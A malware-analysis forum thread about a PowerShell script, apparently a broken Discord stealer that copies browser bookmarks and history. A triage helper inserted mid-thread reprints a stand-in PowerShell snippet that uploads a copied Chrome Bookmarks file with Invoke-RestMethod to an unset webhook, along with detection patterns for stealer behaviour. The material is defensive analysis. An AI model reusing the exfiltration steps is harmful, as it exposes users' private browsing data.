Malware Analysis Evasive Stealer or Broken Sample?

Xeno1234

Level 14
Thread author
Jun 12, 2023
699
Possible PowerShell password stealer I came across. Marked as clean by multiple online analysis sites, but in the code it appears to take passwords and upload them to Discord. Might be broken, as multiple errors are displayed.
Could someone take a deeper look?


WhiteMouse

Level 5
Verified
Well-known
Apr 19, 2017
237
It doesn't seem like a password stealer to me. It only copies history and browser bookmarks to Temp\BrowserData.txt.


likeastar20

Level 8
Verified
Mar 24, 2016
361
Didn’t test it/look at the code, but check the VT analysis:

“…Overall, the code seems to be designed to extract browser data and upload it to Discord, potentially for malicious purposes…”

Xeno1234

Level 14
Thread author
Jun 12, 2023
699
I’ve looked at this file a bit more and it appears to be a broken sample.

In all of the sandboxes, I'm 99% sure no Discord webhook request was made (which is how it should transfer the data). Therefore the data just stays on the system.

struppigel

Moderator
Verified
Staff Member
Well-known
Apr 9, 2020
656
With this file not being obfuscated it is quite straightforward to determine what it does and that is copying bookmarks and history of Chrome, Firefox, Edge and Opera to BookMarks.txt and uploading this to Discord as indicated by the PowerShell function name.

What is missing is the context where and how this PowerShell code is being used.
This part of the code references a variable $dc
$hookurl = "$dc"

This variable is not set, but it should contain the upload location for Discord. This is also the reason why it is not working. There is no evasion going on, it is just incomplete.

Without context it can be hard to determine if such a file is malicious or clean. However, in this case, I would give it a malware verdict, because I cannot imagine any legitimate reason to upload such data to Discord.

There might be a small chance that some legitimate application has an edge case for doing this, but as a malware analyst I would decide to detect this as malware until someone complains, because in all cases I have seen so far such a functionality was in context of a stealer or RAT with stealing functionality, using Discord channels to communicate and exfiltrate data.

It is odd though, that the code is not obfuscated. I can imagine this being the result of an AMSI dump, it being the code after unpacking, or being some template or example code for a malware.
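A small static triage helper along the lines of the reasoning in this post, added here as an example and not taken from the thread or the sample: it looks for stealer indicators (Discord/webhook names, browser data paths, an HTTP upload cmdlet) and for variables that are read but never assigned, which is exactly how the unset `$dc` shows up. The embedded PowerShell text is a constructed stand-in, not the real script.

```python
import re

# Constructed stand-in for the discussed script (not the real sample): an upload
# function whose webhook URL comes from a variable that is never assigned.
SAMPLE_SCRIPT = r'''
function Upload-Discord {
    param([string]$file)
    $hookurl = "$dc"
    Invoke-RestMethod -Uri $hookurl -Method Post -InFile $file
}
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Bookmarks" "$env:TEMP\BookMarks.txt"
Upload-Discord "$env:TEMP\BookMarks.txt"
'''

# Triage indicators: a tag and the pattern that raises it.
INDICATORS = [
    ("discord_exfil", re.compile(r"discord|hookurl|webhook", re.I)),
    ("browser_data", re.compile(r"\\(History|Bookmarks|places\.sqlite)\b", re.I)),
    ("http_upload", re.compile(r"Invoke-(RestMethod|WebRequest)\b", re.I)),
]

ASSIGN = re.compile(r"\$(\w+)\s*=")          # $name = ...
PARAM = re.compile(r"\[\w+\]\s*\$(\w+)")     # [type]$name inside param(...)
REF = re.compile(r"\$(\w+)")                 # any $name, including inside "..."
AUTOMATIC = {"env", "_", "PSScriptRoot", "true", "false", "null", "args"}

def unassigned_variables(script: str) -> set:
    """Variables referenced somewhere but never assigned or declared as a parameter."""
    referenced = set(REF.findall(script))
    defined = set(ASSIGN.findall(script)) | set(PARAM.findall(script))
    return referenced - defined - AUTOMATIC

def triage(script: str) -> dict:
    """Return indicator tags, unassigned variables and a short triage verdict."""
    hits = sorted(tag for tag, rx in INDICATORS if rx.search(script))
    missing = sorted(unassigned_variables(script))
    stealer_like = {"discord_exfil", "browser_data"} <= set(hits)
    if stealer_like and missing:
        verdict = "stealer-like, but incomplete (unset: %s)" % ", ".join(missing)
    elif stealer_like:
        verdict = "stealer-like"
    else:
        verdict = "no stealer indicators"
    return {"indicators": hits, "unassigned": missing, "verdict": verdict}

if __name__ == "__main__":
    print(triage(SAMPLE_SCRIPT))
```

An unassigned variable feeding the upload URL is evidence that the script is incomplete, not that it is benign; the verdict string keeps both facts visible.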

Xeno1234

Level 14
Thread author
Jun 12, 2023
699
I believe I've found another sample similar to this one.
Appears to be some obscure macro software, but I don't think it's legitimate. It's signed by Node JS and its name leads to it being part of their software, references something related to Minecraft services, and also runs a modified version of conhost, whose process name relates to Raccoon Stealer.
Clean on Opentip, Sophos Intelix, Triage, and low VT detections.

Detected by Falcon Sandbox

Xeno1234

Level 14
Thread author
Jun 12, 2023
699
> I believe I've found another sample similar to this one.
> Appears to be some obscure macro software, but I don't think it's legitimate. It's signed by Node JS and its name leads to it being part of their software, references something related to Minecraft services, and also runs a modified version of conhost, whose process name relates to Raccoon Stealer.
> Clean on Opentip, Sophos Intelix, Triage, and low VT detections.
>
> Detected by Falcon Sandbox

Kaspersky added signatures. Fully undetected by Checkpoint Harmony yesterday.

likeastar20

Level 8
Verified
Mar 24, 2016
361
> Kaspersky added signatures. Fully undetected by Checkpoint Harmony yesterday.
>
> > I believe I've found another sample similar to this one.
> > Appears to be some obscure macro software, but I don't think it's legitimate. It's signed by Node JS and its name leads to it being part of their software, references something related to Minecraft services, and also runs a modified version of conhost, whose process name relates to Raccoon Stealer.
> > Clean on Opentip, Sophos Intelix, Triage, and low VT detections.
> >
> > Detected by Falcon Sandbox

Interesting detection name by Kaspersky.

struppigel

Moderator
Verified
Staff Member
Well-known
Apr 9, 2020
656
> I believe I've found another sample similar to this one.
> Appears to be some obscure macro software, but I don't think it's legitimate. It's signed by Node JS and its name leads to it being part of their software, references something related to Minecraft services, and also runs a modified version of conhost, whose process name relates to Raccoon Stealer.
> Clean on Opentip, Sophos Intelix, Triage, and low VT detections.
>
> Detected by Falcon Sandbox

Judging from the screenshot and the configuration file contents, it is a malware-spreading hacktool.
I do not see similarity to the earlier sample.

